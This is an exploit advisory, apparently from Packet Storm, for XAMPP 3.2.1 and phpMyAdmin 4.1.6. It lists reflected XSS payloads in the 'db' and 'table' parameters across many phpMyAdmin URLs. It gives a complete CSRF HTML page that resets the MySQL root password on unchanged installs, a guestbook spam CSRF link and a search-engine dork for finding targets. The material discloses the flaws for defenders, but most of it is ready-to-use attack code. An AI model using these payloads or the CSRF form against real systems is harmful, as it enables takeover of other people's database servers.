XAMPP 3.2.1 / phpMyAdmin 4.1.6 XSS / CSRF

2014-04-0500:00:00
Mayank Kapoor
packetstormsecurity.com
JSON
`# Title: XAMPP 3.2.1 & phpMyAdmin 4.1.6 <= multiple vulnerabilities  
# Date: 6/04/2014  
# Author:   
# Software Link: http://www.apachefriends.org/en/xampp-windows.html  
# Version: 3.2.1 & 4.1.6  
# Tested on: Windows 7  
# CVE : ()  
  
██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ██▀███ ▓█████▄ ▓█████ ██████ ██ ▄█▀  
▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▓██ ▒ ██▒▒██▀ ██▌▓█ ▀ ▒██ ▒ ██▄█▒   
▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ▓██ ░▄█ ▒░██ █▌▒███ ░ ▓██▄ ▓███▄░   
░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ▒██▀▀█▄ ░▓█▄ ▌▒▓█ ▄ ▒ ██▒▓██ █▄   
░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░██▓ ▒██▒░▒████▓ ░▒████▒▒██████▒▒▒██▒ █▄  
▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░ ▒▒▓ ▒ ░░ ▒░ ░▒ ▒▓▒ ▒ ░▒ ▒▒ ▓▒  
▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ▒ ░ ░ ░░ ░▒ ░ ░░ ░▒ ▒░  
░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░   
░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░   
  
[#]----------------------------------------------------------------[#]  
#  
# [x] XAMPP & phpMyAdmin <= 4.1.6 multiple vulnerabilites  
# [x] Author : Mayank Kapoor(@wHys0SerI0s) Sujoy Chakravarti(@sujoy3188), Gurjant Singh Sadhra(@GurjantSadhra)  
# [x] Contact : [email protected], [email protected], [email protected]  
# [+] Download : http://www.apachefriends.org/en/xampp-windows.html  
#  
[#]----------------------------------------------------------------[#]  
#  
# [x] Exploit :  
#  
[1] phpMyAdmin is vulnerable to a cross site scripting attack.  
# The vulnerability exists within the phpMyAdmin module supplied by XAMPP.  
#  
# 1. Cross Site Scripting  
#   
# In the phpMyAdmin module of the XAMPP application the following urls are vulnerable to cross site scripting attacks. The "db" parameter can be passed with   
# { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack. The file "c:\xampp\phpMyAdmin\libraries\db_table_exists.lib.php"  
# checks if the "db" parameter is a valid database name or not (line 13-18).  
#  
if (empty($is_db)) {  
if (strlen($db)) {  
$is_db = @$GLOBALS['dbi']->selectDb($db);  
} else {  
$is_db = false;  
}  
  
  
# Vulnerable parameter: "db"  
# http://[host]/phpmyadmin/chk_rel.php?db=>"'><img src="javascript:alert(311050)">&token=6026d96cfcb8993f744a00809536dc8b&goto=db_operations.php  
#  
# Multiple URL's afected:  
http://[host]/phpmyadmin/db_printview.php  
http://[host]/phpmyadmin/index.php  
http://[host]/phpmyadmin/pmd_general.php  
http://[host]/phpmyadmin/prefs_manage.php  
http://[host]/phpmyadmin/server_collations.php  
http://[host]/phpmyadmin/server_databases.php  
http://[host]/phpmyadmin/server_engines.php  
http://[host]/phpmyadmin/server_export.php  
http://[host]/phpmyadmin/server_import.php  
http://[host]/phpmyadmin/server_privileges.php  
http://[host]/phpmyadmin/server_replication.php  
http://[host]/phpmyadmin/server_sql.php  
http://[host]/phpmyadmin/server_status.php  
http://[host]/phpmyadmin/server_variables.php  
http://[host]/phpmyadmin/sql.php  
http://[host]/phpmyadmin/tbl_create.php  
  
# Vulnerable parameter: "table"  
#  
# Similar to the above mentioned vulnerability, here the "table" parameter also can be submitted with { >"'><img src="javascript:alert(311050)"> } in the url resulting in a reflected cross site scripting attack.  
#  
# Multiple URL's afected:  
  
http://[host]/phpmyadmin/tbl_select.php?db=information_schema&token=6026d96cfcb8993f744a00809536dc8b&goto=db_structure.php&table=>"'><img src="javascript:alert(347790)">#PMAURL-0:tbl_select.php?db=information_schema&table=>"'><img+src="javascript:alert(347790)">&server=1&target=&lang=en&collation_connection=utf8mb4_general_ci&token=529d5dba2f3dd12daf48aa38596e1708  
  
http://[host]/phpmyadmin/tbl_structure.php  
#  
#  
# 2. Cross Site Request Forgery  
# After installing XAMPP the default password for MySQL is blank with the default user being "root". In the link "http://localhost/security/xamppsecurity.php" there is an option to change  
# the MySQL password for the user "root". The form that submits the new password is not authenticated with a token or any such XSRF protection. The below html page can be sent to the victim,  
  
<html>  
<script>  
document.getElementById("xampp").submit();  
</script>  
<body onload="run_once()">  
<form id="xampp" action="http://localhost/security/xamppsecurity.php" method="POST">  
<input type="hidden" name="mypasswd" value="test@123" />  
<input type="hidden" name="mypasswdrepeat" value="test@123" />  
<input type="hidden" name="authphpmyadmin" value="cookie" />  
<input type="hidden" name="changing" value="Password changing" />  
<input type="hidden" name="xamppuser" value="" />  
<input type="hidden" name="xampppasswd" value="" />  
<input type="submit" value="Click here" />  
</form>  
</body>  
</html>  
  
# thus succesfully changing the password to "test@123". This will only work if the password has never been changed since installation.  
#  
#  
# Another location in the XAMPP application vulnerable to Cross site request forgery is the guestbook section http://localhost/xampp/guestbook-en.pl .  
  
http://localhost/xampp/guestbook-en.pl?f_name=spam&f_email=spam&f_text=spam  
  
dork: "inurl:xampp/guestbook-en.pl"  
  
[#]----------------------------------------------------------------[#]  
  
#EOF  
`
JSON